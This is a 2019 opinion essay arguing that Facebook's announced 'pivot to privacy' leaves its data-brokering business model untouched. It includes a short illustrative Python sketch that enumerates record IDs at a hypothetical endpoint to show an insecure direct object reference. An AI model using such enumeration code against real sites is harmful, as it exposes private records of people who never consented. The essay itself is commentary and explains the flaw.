Pivoting Privacy

3/6/2019

Earlier today, Mark Zuckerberg posted a note promising a shift in focus for the company he founded. "Public social networks," he wrote,

will continue to be very important in people's lives — for connecting with everyone you know, discovering new people, ideas and content, and giving people a voice more broadly. People find these valuable every day, and there are still a lot of useful services to build on top of them. But now, with all the ways people also want to interact privately, there's also an opportunity to build a simpler platform that's focused on privacy first.

A "pivot to privacy" was not entirely unexpected. Facebook has spent the last several years at the center of a political and public relations firestorm over the privacy of users of commercially-owned social media. And there were indications that Zuckerberg was ready to meet the backlash with changes to the business. One of the most significant in recent months was news that Facebook might merge Instagram and Messenger with its more privacy-oriented acquisition, WhatsApp. "A Privacy-Focused Vision for Social Networking" is intended to signal something more sweeping and holistic. It implies a philosophical realignment of the entire company.

I'm skeptical, but then, Zuckerberg anticipated as much:

I understand that many people don't think Facebook can or would even want to build this kind of privacy-focused platform — because frankly we don't currently have a strong reputation for building privacy protective services, and we've historically focused on tools for more open sharing. But we've repeatedly shown that we can evolve to build the services that people really want, including in private messaging and stories.

That concession is cushioned with a number of half-truths. For one thing, recently publicized documents, showing that Facebook pushed media partners to pivot to video even after it became clear that users weren't as captivated as advertised, belie the idea that the company's evolution is driven by the aim of building services that people want.

More than that, though, our skepticism isn't built on the weakness of Facebook's reputation for building privacy protective services. Rather, it's the company's success at building communication services into tools for harvesting data about its users that makes us doubtful. To get a better sense of the difference, consider a case like that of Georgia's online voter database. Last year, a researcher realized that, simply by typing over portions of the URL, nearly anyone could view any of the 6 million voter records stored on the public-facing site. That is, of course, a colossal failure of privacy protection, but it was almost certainly the result of incompetence rather than design.
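To make that failure mode concrete, here is a minimal sketch of the kind of enumeration the Georgia flaw reportedly allowed: an insecure direct object reference, where the server trusts whatever record ID appears in the URL and performs no authorization check. The endpoint and parameter name below are hypothetical, invented purely for illustration.

```python
# Hypothetical sketch of an insecure direct object reference (IDOR):
# the server returns whatever record the URL asks for, with no check
# that the requester is authorized to see it. Endpoint and parameter
# names are invented for illustration only.
import requests

BASE_URL = "https://voter-portal.example/records"  # hypothetical endpoint

def fetch_record(record_id: int) -> str | None:
    """Request a single record page; return its HTML, or None on failure."""
    resp = requests.get(BASE_URL, params={"id": record_id}, timeout=10)
    return resp.text if resp.ok else None

# "Typing over portions of the URL" amounts to walking the ID space:
for record_id in range(1, 6):
    page = fetch_record(record_id)
    if page is not None:
        print(f"record {record_id}: {len(page)} bytes returned")
```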

By contrast, inadvertent data leaks account for very little of the outrage leveled against Facebook. No one doubts the company's ability to build secure services — at least, relative to the standards of other online platforms. Rather, our distrust is founded on the long march of revelations about how the company has elected to use the data it collects — including data about people who have never opened a Facebook account — culminating in news that Facebook had allowed a Russian researcher to harvest information from tens of millions of accounts, which was then turned over to a British firm working for the Trump Campaign.

For anyone who has paid close attention, the principal worry is not that Facebook will suffer security lapses like the one that exposed voter records in Georgia; it's that the company's business model is built on selling access to data. In Congressional hearings, Zuckerberg repeatedly insisted that Facebook doesn't "sell people's data." That's technically true, it seems, but it deliberately obscures the fact that access to data is the added value that attracts advertisers to the site. The question looming over any pivot to privacy must be: How does Facebook evolve beyond providing third-party access to data?

I see no answer to that question in Zuckerberg's note. Instead, what I see is an effort to pivot how the rest of us understand what constitutes privacy on commercially-owned social media platforms.

Part of the method is repetition. Variations on the word "private" appear 50 times in Zuckerberg's note. If he can get the rest of us to talk about privacy in the same terms, then he can claim at least one public relations victory. But the way that he talks about privacy doesn't necessarily cover all the concerns we've had in mind. Two themes predominate. One is security against public exposure. The other is impermanence, the promise that what we share won't stick around forever. At no point does he signal a change in how Facebook manages the relationship between the data generated by its users and the advertisers who are its real customers.

It's possible to interpret his discussion of security as covering Facebook's role as a data broker, but doing so would require ignoring how Facebook has dealt with that topic in the past. The way that Zuckerberg writes about security in "A Privacy-Focused Vision" resonates with the testimony he recently gave before Congress. There, he emphasized that users were in control of who could access the information they post to Facebook. In order for that to be true, Zuckerberg's construal of "information" must have somehow excluded the user data Facebook provides to its affiliates without the explicit consent of the users that data describes. In the absence of a more explicit assurance to the contrary, there's every reason to suppose that the same exception applies in his new vision of a privacy-oriented Facebook.

If so, then what he's pitching here is a vision of privacy oriented around deliberate speech. But the most disconcerting effect of social media is its propensity to expose not what we meant to say to a select few, but what we never meant to say to anyone. Facebook is built on unearthing the unspoken from our online interactions and making it available to advertisers, researchers and political operations. Nothing in Zuckerberg's new vision gives us reason to suppose that part is changing.
